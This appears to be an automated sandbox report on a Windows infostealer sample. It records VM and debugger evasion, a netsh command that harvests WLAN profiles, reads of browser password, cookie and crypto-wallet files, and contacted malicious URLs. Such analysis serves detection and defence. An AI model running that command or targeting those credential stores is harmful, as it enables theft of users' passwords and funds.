            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -595156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 6632Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 6580Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Users\user\Desktop\14posdLrGh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
            Source: C:\Users\user\Desktop\14posdLrGh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Users\user\Desktop\14posdLrGh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 599871Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 599746Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 599587Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 599464Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 599353Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 599211Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 598677Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 598557Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 598451Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 598343Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 598233Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 598016Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 597766Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 597547Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 597438Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 597313Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 597198Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 596969Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 596750Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 596640Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 596484Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 596374Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 596266Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 596156Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 596047Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 595938Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 595828Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 595719Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 595594Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 595484Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 595375Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 595266Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 595156Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000275F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000275F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMToolsHook.dll
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000275F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000275F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmmousever.dll
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.00000000024D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 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
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000275F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmmousever
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000275F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareLR^q
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000275F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMToolsHookLR^q
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000275F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VirtualMachine: @
            Source: 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003790000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1680992621.0000000005580000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: xeqemuh
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1677581277.00000000028FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VirtualMachine: False
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000275F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmmouseverLR^q
            Source: 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003790000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1680992621.0000000005580000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: nodunuqemuzanihiterator
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000275F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VirtualMachine:
            Source: 14posdLrGh.exe, 00000000.00000002.1677031531.0000000000685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000275F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMToolsHook
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_057A03AC CheckRemoteDebuggerPresent,0_2_057A03AC
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeQueries volume information: C:\Users\user\Desktop\14posdLrGh.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Uses netsh to modify the Windows network and firewall settings
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
            Source: 14posdLrGh.exe, 00000000.00000002.1680724051.00000000054AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\14posdLrGh.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected PXRECVOWEIWOEI Stealer
            Source: Yara matchFile source: 00000000.00000002.1677581277.0000000002919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 14posdLrGh.exe PID: 6516, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^qSC:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbt-^q
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q3C:\Users\user\AppData\Roaming\Exodus\exodus.wallett-^q
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q0C:\Users\user\AppData\Roaming\Ethereum\keystoret-^q
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q4C:\Users\user\AppData\Local\Coinomi\Coinomi\walletst-^q
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q0C:\Users\user\AppData\Roaming\Ethereum\keystoret-^q
            Tries to harvest and steal WLAN passwords
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\14posdLrGh.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key3.dbJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\14posdLrGh.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000000.00000002.1677581277.00000000024D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 14posdLrGh.exe PID: 6516, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected PXRECVOWEIWOEI Stealer
            Source: Yara matchFile source: 00000000.00000002.1677581277.0000000002919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 14posdLrGh.exe PID: 6516, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
            Windows Management Instrumentation            		1
            DLL Side-Loading            		11
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		1
            Query Registry            		Remote Services1
            Email Collection            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		11
            Disable or Modify Tools            		LSASS Memory451
            Security Software Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)161
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin Shares2
            Data from Local System            		3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection            		NTDS161
            Virtualization/Sandbox Evasion            		Distributed Component Object Model1
            Clipboard Data            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Software Packing            		Cached Domain Credentials1
            System Network Configuration Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Timestomp            		DCSync24
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1438234 Sample: 14posdLrGh.exe Startdate: 08/05/2024 Architecture: WINDOWS Score: 100 25 whatismyipaddressnow.co 2->25 27 ip-api.com 2->27 29 2 other IPs or domains 2->29 37 Multi AV Scanner detection for domain / URL 2->37 39 Antivirus detection for URL or domain 2->39 41 Antivirus / Scanner detection for submitted sample 2->41 43 7 other signatures 2->43 8 14posdLrGh.exe 15 36 2->8         started        12 msiexec.exe 2->12         started        signatures3 process4 dnsIp5 31 ip-api.com 208.95.112.1, 49732, 80 TUT-ASUS United States 8->31 33 icanhazip.com 104.16.184.241, 49731, 80 CLOUDFLARENETUS United States 8->33 35 whatismyipaddressnow.co 172.67.143.245, 443, 49730, 49733 CLOUDFLARENETUS United States 8->35 45 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->45 47 Tries to steal Mail credentials (via file / registry access) 8->47 49 Found many strings related to Crypto-Wallets (likely being stolen) 8->49 51 4 other signatures 8->51 14 cmd.exe 1 8->14         started        signatures6 process7 signatures8 53 Uses netsh to modify the Windows network and firewall settings 14->53 55 Tries to harvest and steal WLAN passwords 14->55 17 netsh.exe 2 14->17         started        19 conhost.exe 14->19         started        21 findstr.exe 1 14->21         started        23 chcp.com 1 14->23         started        process9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            14posdLrGh.exe32%ReversingLabsByteCode-MSIL.Trojan.Zilla
            14posdLrGh.exe38%VirustotalBrowse
            14posdLrGh.exe100%AviraTR/Dropper.MSIL.Gen
            14posdLrGh.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            whatismyipaddressnow.co9%VirustotalBrowse
            114.82.9.0.in-addr.arpa0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
            http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
            https://whatismyipaddressnow.co/API/FETCH/getcountry.php100%Avira URL Cloudmalware
            https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=KdudHBIkdYW9100%Avira URL Cloudphishing
            http://whatismyipaddressnow.co0%Avira URL Cloudsafe
            https://support.micro0%Avira URL Cloudsafe
            https://whatismyipaddressnow.co0%Avira URL Cloudsafe
            http://whatismyipaddressnow.co9%VirustotalBrowse
            https://whatismyipaddressnow.co/API/FETCH/getcountry.php12%VirustotalBrowse
            https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=KdudHBIkdYW99%VirustotalBrowse
            https://whatismyipaddressnow.co9%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            whatismyipaddressnow.co
            		172.67.143.245
            		truefalseunknown
            ip-api.com
            		208.95.112.1
            		truefalse
              		high
              icanhazip.com
              		104.16.184.241
              		truefalse
                		high
                114.82.9.0.in-addr.arpa
                		unknown
                		unknownfalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://icanhazip.com/false
                  		high
                  https://whatismyipaddressnow.co/API/FETCH/getcountry.phpfalse
                  • 12%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=KdudHBIkdYW9false
                  • 9%, Virustotal, Browse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://ip-api.com/line/?fields=hostingfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
